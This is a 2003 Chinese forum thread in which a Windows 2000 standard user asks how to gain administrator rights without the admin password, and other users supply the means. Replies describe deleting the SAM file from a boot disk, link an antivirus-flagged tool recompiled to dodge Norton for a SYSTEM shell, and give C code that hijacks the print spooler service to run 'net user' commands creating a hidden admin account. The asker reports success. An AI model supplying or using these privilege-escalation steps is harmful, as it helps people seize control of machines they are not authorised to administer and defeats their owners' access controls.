社区
windows网络管理与配置
帖子详情
急急:我只是win2k的一般用户,请问我可以通过什么手段添加一个admin用户吗?原来admin的密码我没有?
cooking
2003-04-08 04:40:15
我想通过这个办法把目前的登陆身份提升为admin。
...全文
56
20
打赏
收藏
急急:我只是win2k的一般用户,请问我可以通过什么手段添加一个admin用户吗?原来admin的密码我没有?
我想通过这个办法把目前的登陆身份提升为admin。
复制链接
扫一扫
分享
转发到动态
举报
AI
作业
写回复
配置赞助广告
用AI写文章
20 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
cooking
2003-04-09
打赏
举报
回复
哈哈,终于搞定啦
spark_li
2003-04-09
打赏
举报
回复
另外没有注册的ntfsdos只能查看文件,而不能删除文件
spark_li
2003-04-09
打赏
举报
回复
http://bbs.nju.edu.cn/file/1049854631spoolsv.exe
这个down下来保存为spoolsv.exe
http://bbs.nju.edu.cn/file/ERunAsX.dll
这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试
你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
cooking
2003-04-09
打赏
举报
回复
我也停不了spooler服务啊,
C:\>net stop spooler
系统发生 5 错误。
拒绝访问。
cooking
2003-04-09
打赏
举报
回复
http://bbs.nju.edu.cn/file/2ksystem.zip
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
cooking
2003-04-09
打赏
举报
回复
我可以用软盘启动,是ubs软盘,也用了ntfsdos,但就是删不不掉那个该死的sam,
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
spark_li
2003-04-09
打赏
举报
回复
To cooking()
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限
不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。
此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp
#include <stdlib.h>
void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}
6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。
此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。
不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
asdfxcv
2003-04-08
打赏
举报
回复
没有管理员密码的话,就不能做你上面那些想做的事情,谁叫你装的是WIN2000,而且还装了补丁呢?如果没有装补丁的话,上面很多都可以实现的。
cooking
2003-04-08
打赏
举报
回复
spark_li(晕忽忽(恶人谷:通讯连长)) :别说风凉话啊,你有什么好一点,简单一点的办法啊
上面他们说的我都试了,没有成功啊,小弟愚钝:(
simplehe2002(核桃)
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!
cooking
2003-04-08
打赏
举报
回复
xumiao(猫猫) ,请详细一点好吗?我加了失败啊
spark_li
2003-04-08
打赏
举报
回复
对付sp2,本地拿权限的方法多了
xumiao
2003-04-08
打赏
举报
回复
看看关于输入法的漏洞吧。
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
ysqu
2003-04-08
打赏
举报
回复
你在本版上面的搜索中输入“忘记密码”
就可以看到很多方法
或者到search.csdn.net 中查寻
Swanzy
2003-04-08
打赏
举报
回复
可以用Linux启动盘修改admin密码
boris007
2003-04-08
打赏
举报
回复
可以建用户 但没有任何权限
除非有管理员的密码 管理员给你权限
iamholly
2003-04-08
打赏
举报
回复
如果没人管你,你可以修复,呵呵~~
simplehe2002
2003-04-08
打赏
举报
回复
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
jxhaq
2003-04-08
打赏
举报
回复
用CHNTPW这个软件破解密码,下载一个用一用就知道怎公回事了
cooking
2003-04-08
打赏
举报
回复
呵呵,我的正好是sp2,哪里下这个软件啊,我找不到啊?:(
lovestart
2003-04-08
打赏
举报
回复
一般情况下是不可以的,如果没有打sp3的话还可以用一个叫erunas的软件。
Cognos应用
什么是PPES?PlowePlay Enterprise Server 2. Cognos服务器移植后PlowePlay Enterprise Server打不开了拒绝访问(Access is denied)这是新装的Cognos服务器,将原先服务器上的cer1/bin下执行upfpack打包,将Access ...
WEB开发文档2 总结
.net 实现在
一个
文本框里写入源代码,然后通过提交就能返回给
用户
代码的编译结果,执行结果,错误信息等 DataGrid的ItemTemplate中怎样获取绑定的数据值? 怎样在asp.net web应用程序中获取注册表编辑权限...
MS-SQL Server 基础类 - SQL语句
各位高手好,
请问
我可以在SQL SERVER里设置
一个
约束来控制
一个
表里的字段的值的总和不超过某...
一个
简单的
添加
记录语句,求解! 如何删除同
一个
表中的重复记录,只有3个字段重复。但不是全部删除掉。的留下一条把 向...
技术
"打个比方说,我想要把
一个
箱子推倒
一个
地方,这个地方就是我的目的,我为了到达那里,我是不是要估计一下按什么路线推,要推多快。然后我就开始推,还要不时的和原先的计划比较比较,需不需要调整路线和速度。这个...
电气工程及其自动化在电力系统的发展.docx
电气工程及其自动化在电力系统的发展.docx
windows网络管理与配置
6,210
社区成员
60,336
社区内容
发帖
与我相关
我的任务
windows网络管理与配置
windows网络管理与配置
复制链接
扫一扫
分享
社区描述
windows网络管理与配置
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章